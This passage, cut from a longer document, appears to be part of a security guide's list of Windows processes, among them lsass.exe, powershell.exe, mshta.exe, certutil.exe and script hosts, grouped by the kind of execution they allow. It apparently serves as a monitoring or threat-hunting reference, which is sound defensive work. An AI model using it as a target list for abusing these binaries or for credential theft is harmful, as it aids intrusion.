   * `lsass.exe`
   * `winlogon.exe`
2. **Versatile Execution Processes:**
   * `powershell.exe`
   * `cmd.exe`
   * `rundll32.exe`
   * `mshta.exe`
   * `reg.exe`
   * `certutil.exe`
3. **COM and Shell Processes:**
   * `dllhost.exe`
   * `explorer.exe`
4. **Automation and Scripting Processes:**
   * `wscript.exe`
   * `cscript.exe`

